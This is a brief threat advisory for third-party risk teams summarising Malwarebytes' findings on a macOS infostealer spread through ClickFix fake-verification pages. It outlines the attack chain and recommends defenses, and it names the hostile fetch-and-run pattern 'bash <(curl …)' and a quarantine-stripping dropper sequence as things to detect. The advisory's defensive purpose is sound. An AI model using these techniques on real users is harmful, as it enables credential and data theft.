New macOS Infostealer “Infiniti Stealer” Leverages ClickFix Social‑Engineering to Harvest Sensitive Data
What Happened – Malwarebytes discovered a previously undocumented macOS infostealer, now named Infiniti Stealer. It is delivered via a fake CAPTCHA/verification page that tricks users into pasting a malicious command into Terminal (the “ClickFix” technique). The payload is a Python‑based stealer compiled with Nuitka into a native Mach‑O binary, making detection harder.
Why It Matters for TPRM –
- Social‑engineering delivery bypasses many traditional endpoint controls, increasing risk for third‑party vendors that manage macOS workstations.
- The use of a compiled Python binary evades signature‑based scanners, raising the likelihood of successful data exfiltration from partner environments.
- Early‑stage campaigns often expand quickly; vendors should assess exposure before the tool matures.
Who Is Affected – Technology & SaaS providers, MSPs, and any organization that supplies or supports macOS endpoints to employees or customers.
Recommended Actions –
- Review macOS endpoint hardening policies for all third‑party managed devices.
- Block execution of unknown binaries from
/tmpand enforce strict quarantine attributes. - Deploy behavioral detection for “ClickFix” command patterns (e.g.,
bash <(curl …)in Terminal). - Conduct phishing awareness training that includes macOS‑specific social‑engineering scenarios.
Technical Notes – The attack chain starts with a fake Cloudflare‑style verification page (update‑check.com) that serves a base‑64‑encoded curl command. The first stage is a Bash dropper that writes a Nuitka‑compiled Mach‑O loader to /tmp, removes the quarantine flag, and launches it with C2 details passed via environment variables. The loader decompresses a ZSTD archive and runs a Python stealer capable of harvesting credentials, browser data, and files. No CVE is involved; the vector is pure social engineering (ClickFix). Source: Malwarebytes Labs